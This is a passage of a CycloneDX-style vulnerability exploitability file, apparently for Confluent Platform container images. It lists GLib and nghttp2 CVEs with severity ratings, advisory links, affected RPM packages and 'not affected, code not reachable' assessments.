          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58013",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        126
      ],
      "description": "A flaw was found in GLib. A buffer over-read can occur in g_io_channel_read_line_backend() in the giochannel.c file when a custom line terminator with a length greater than one is set, causing memcmp to read past the GString buffer. This vulnerability can cause a minor information disclosure of 7 bytes or a denial of service when the buffer over-read crosses a page boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58013"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58013"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://github.com/advisories/GHSA-4x46-h598-64qr"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3925"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58013.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58013"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58013"
        }
      ],
      "published": "2026-06-30T13:19:17+00:00",
      "updated": "2026-08-17T10:16:41+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58014",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.6,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.6,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        193
      ],
      "description": "A flaw was found in GLib. An off-by-one error can occur in the g_key_file_get_locale_string_list function in the gkeyfile.c file when loading a key file with an empty value. This flaw can cause an out-of-bounds access of 1 byte or a denial of service when the out-of-bounds access crosses a page boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58014"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58014"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://github.com/advisories/GHSA-h88q-m8mm-7243"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3930"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58014.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58014"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58014"
        }
      ],
      "published": "2026-06-30T13:19:17+00:00",
      "updated": "2026-08-17T10:16:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58015",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        22
      ],
      "description": "A flaw was found in GLib. The D-Bus client-side implementation of the DBUS_COOKIE_SHA1 SASL authentication mechanism does not validate the cookie_context parameter received from the server. A malicious D-Bus server can supply a cookie_context containing path traversal sequences, causing the client to read an arbitrary file and exfiltrate sensitive data by verifying guessed file contents against a generated hash.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58015"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58015"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://github.com/advisories/GHSA-hmpf-72wc-2r6x"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3931"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58015.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58015"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58015"
        }
      ],
      "published": "2026-06-30T13:19:17+00:00",
      "updated": "2026-08-17T10:16:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58055",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        444
      ],
      "description": "nghttp2's nghttpx proxy through 1.69.0 forwards an HTTP/1.1 Upgrade request that also carries a Content-Length header and body onto reusable keep-alive backend connections, re-adding the Upgrade and Connection headers while passing Content-Length verbatim. A backend that resolves the resulting ambiguous message in the attacker's favor enables HTTP request/response smuggling and cross-client response-queue poisoning.",
      "recommendation": "Upgrade libnghttp2 to version 1.43.0-6.el9_8.2",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58055"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54662"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55804"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58055"
        },
        {
          "url": "https://bugzilla.redhat.com/2493954"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2493954"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58055"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-54662.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55804"
        },
        {
          "url": "https://github.com/advisories/GHSA-xrr7-82jr-v58x"
        },
        {
          "url": "https://github.com/bikini/exploitarium/tree/main/nghttp2-nghttpx-upgrade-queue-poison-poc"
        },
        {
          "url": "https://github.com/nghttp2/nghttp2/commit/ab28105c4a0197da24f8bfc414bc116055249e1e"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58055.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55804.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58055"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8495-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58055"
        },
        {
          "url": "https://www.vulncheck.com/advisories/nghttp2-nghttpx-http-request-response-smuggling-via-upgrade-request-with-content-length"
        }
      ],
      "published": "2026-06-28T02:16:32+00:00",
      "updated": "2026-06-30T17:41:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.43.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
